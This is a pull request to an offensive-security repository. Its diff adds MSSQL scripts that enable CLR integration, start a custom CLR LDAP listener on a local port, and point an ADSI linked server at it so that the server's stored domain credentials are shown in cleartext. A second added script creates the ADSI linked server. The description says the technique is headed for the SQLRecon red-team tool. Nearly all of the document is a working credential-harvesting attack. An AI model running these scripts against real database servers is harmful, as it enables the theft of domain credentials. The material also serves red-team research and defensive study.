### PR TITLE
Made a couple of updates

### DIFF
--- a/MSSQL linked servers - ADSI/assembly.sql
+++ b/MSSQL linked servers - ADSI/assembly.sql
@@ -7,4 +7,8 @@ CREATE ASSEMBLY ldapServer AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ff
 
 CREATE FUNCTION [dbo].ldap_listen(@port int) RETURNS NVARCHAR(MAX) AS EXTERNAL NAME ldapServer.[ldapAssembly.LdapSrv].listen;
 
+EXEC sp_configure 'clr enabled', 1; RECONFIGURE; 
+
 SELECT dbo.ldap_listen(1234);
+
+SELECT * FROM OpenQuery( linkADSI, 'SELECT * FROM ''LDAP://localhost:1234'' ');

--- a/MSSQL linked servers - ADSI/create-adsi-link.sql
+++ b/MSSQL linked servers - ADSI/create-adsi-link.sql
@@ -1,0 +1,21 @@
+# Create a new ADSI linked server, where '@datasrc=' contains the name of the domain controller
+
+EXEC master.dbo.sp_addlinkedserver
+	@server = N'linkADSI',
+	@srvproduct=N'Active Directory Service Interfaces',
+	@provider=N'ADSDSOObject',
+	@datasrc=N'DC01.DOMAIN.LOCAL';
+
+# Configure authentication to the ADSI linked server.
+
+EXEC master.dbo.sp_addlinkedsrvlogin
+	@rmtsrvname=N'linkADSI',
+	@useself=N'False',
+	@locallogin=NULL,
+	@rmtuser=N'DOMAIN\user',
+	@rmtpassword='password';
+
+
+# Test to see if the link has been created.
+
+SELECT * FROM OPENQUERY( linkADSI, 'SELECT * from ''LDAP://domain.local'' where name=''Administrator'' ')


### PR DESCRIPTION
`create-adsi-link.sql` was created to assist people with quickly creating an ADSI connection to a domain controller.

`assembly.sql` didn't have a query to enable CLR integration, so I've gone ahead and added that in. I also added in the `OPENQUERY` query which will query the local LDAP server and display credentials to the user.

Nice work on this! I'll be adding this technique into v3 of my tool called SQLRecon, which I'll be releasing before presenting at DEF CON and Black Hat this year. I'll certainly give you credit for this technique :)